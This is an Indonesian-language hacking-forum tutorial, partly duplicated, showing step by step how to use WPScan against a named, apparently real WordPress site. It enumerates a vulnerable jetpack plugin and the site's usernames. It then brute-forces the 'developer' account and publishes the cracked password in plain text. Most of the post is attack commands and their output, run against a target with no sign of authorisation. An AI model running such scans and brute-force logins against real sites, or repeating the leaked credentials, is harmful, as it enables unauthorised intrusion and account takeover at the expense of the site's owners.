12-30-2012, 11:49 PM
gak usah kebanyakan bacot g4n:tkp::tkp:
ane ini asli tulis sendiri :-bd
1. buka wpscan.rb ( /pentest/web/wpscan )
2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y.
[*]klo bromilih y,trus udah selesai updatenya,,biasanyw muncul error kya gini pas buka wpscan.rb
solusinya udah ada di error messagenya bro -_- :
3. Ketik ./wpscan.rb atau ./wpscan.rb --help
. sampe sini brobisa nerusin sendiri kan ? \m/
Klo ada yg belum tw,,ya udah ane ksih tutor sekalian. bgi yg udah tw ngapain ente kemari :-?
4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln :
tu bro, nemu 1 plugin vuln,,malah udah dikasih exploit nya
5. skarang coba ane cari username nya :
ada 2 user bro, admin ama developer
wpscan versi bru aneh,,wong cuma nyari username aja,,pluginnya ikut discan juga :-? (buang2 waktu aja)
6. skarang nyari password nya pke brute force :- , harus sediain wordlist.lst nih berarti ( . Wordist ane letaknya di /root/Desktop/wordlist.lst
pic:
penulis : RieqyNS13
wpscan developer : ethicalhacke3r
ane ini asli tulis sendiri :-bd
1. buka wpscan.rb ( /pentest/web/wpscan )
2. ketik wpscan.rb ,,trus enter. biasanya ditanya mw update atau kagak,,klo kagak ente ketik n klo mw update ketik y.
[*]klo bromilih y,trus udah selesai updatenya,,biasanyw muncul error kya gini pas buka wpscan.rb
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb -h
[ERROR] Install missing ruby gem. Please see README file or http://code.google.com/p/wpscan/
#<LoadError: no such file to load -- nokogiri>
Code:
gem install --user-install nokogiri
Code:
root@bt:/pentest/web/wpscan# gem install --user-install nokogiri
WARNING: You don't have /root/.gem/ruby/1.9.2/bin in your PATH,
gem executables will not run.
Building native extensions. This could take a while...
Successfully installed nokogiri-1.5.2
1 gem installed
Installing ri documentation for nokogiri-1.5.2...
Installing RDoc documentation for nokogiri-1.5.2...
3. Ketik ./wpscan.rb atau ./wpscan.rb --help
Code:
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
Help :
Some values are settable in conf/browser.conf.json :
user-agent, proxy, threads, cache timeout and request timeout
--update Update to the latest revision
--url | -u <target url> The WordPress URL/domain to scan.
--force | -f Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)] Enumeration.
option :
u usernames from id 1 to 10
u[10-20] usernames from id 10 to 20 (you must write [] chars)
p plugins
p! only vulnerable plugins
t timthumbs
Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins
If no option is supplied, the default is 'tup!'
--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed
--wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
--proxy Supply a proxy in the format host:port (will override the one from conf/browser.conf.json)
--wordlist | -w <wordlist> Supply a wordlist for the password bruter and do the brute.
--threads | -t <number of threads> The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)
--username | -U <username> Only brute force the supplied username.
--help | -h This help screen.
--verbose | -v Verbose output.
. sampe sini brobisa nerusin sendiri kan ? \m/
Klo ada yg belum tw,,ya udah ane ksih tutor sekalian. bgi yg udah tw ngapain ente kemari :-?
4. Masukin url dan pilih option lainnya, misalkan ane mw liat2 pluginnya yg vuln :
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate p!
Code:
root@bt:/pentest/web/wpscan# ./wpscan.rb --url www.productbestbuy.com --enumerate p!
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 21:54:53 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating installed plugins (only vulnerable ones) ...
Checking for 253 total plugins... 100% complete.
[+] We found 1 plugins:
| Name: jetpack
| Location: http://www.productbestbuy.com/wp-content/plugins/jetpack/
| Directory listing enabled? Yes.
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Finished at Sun Dec 30 21:56:44 2012
5. skarang coba ane cari username nya :
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
Code:
./wpscan.rb --url www.productbestbuy.com --enumerate u
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:22:31 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ... 2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Enumerating usernames ...
We found the following 2 username/s :
admin
developer
wpscan versi bru aneh,,wong cuma nyari username aja,,pluginnya ikut discan juga :-? (buang2 waktu aja)
6. skarang nyari password nya pke brute force :- , harus sediain wordlist.lst nih berarti ( . Wordist ane letaknya di /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
Code:
./wpscan.rb --url www.productbestbuy.com --username developer --wordlist /root/Desktop/wordlist.lst
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v1.1r425
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
[WARNING] The SVN repository is DEPRECATED, use the GIT one - http://github.com/wpscanteam/wpscan
| URL: http://www.productbestbuy.com
| Started on Sun Dec 30 22:36:41 2012
[!] The WordPress theme in use is easel v3.0.7
[!] The WordPress 'http://www.productbestbuy.com/readme.html' file exists
[!] Full Path Disclosure (FPD) in 'http://www.productbestbuy.com/wp-includes/rss-functions.php'
[!] WordPress version 3.4.1 identified from meta generator
[+] Enumerating plugins from passive detection ...
2 found :
| Name: amazon-link
| Location: http://www.productbestbuy.com/$wp-plugins$/amazon-link/
| Name: jetpack
| Location: http://www.productbestbuy.com/$wp-plugins$/jetpack/
|
| [!] jetpack plugin SQL Injection Vulnerability
| * Reference: http://www.exploit-db.com/exploits/18126/
[+] Starting the password brute forcer
Brute forcing user 'developer' with 12 passwords... 58% complete.
[SUCCESS] Username : developer Password : cisadane123456
[+] Finished at Sun Dec 30 22:38:18 2012
Code:
Username : developer Password : cisadane123456
penulis : RieqyNS13
wpscan developer : ethicalhacke3r
403 Forbidden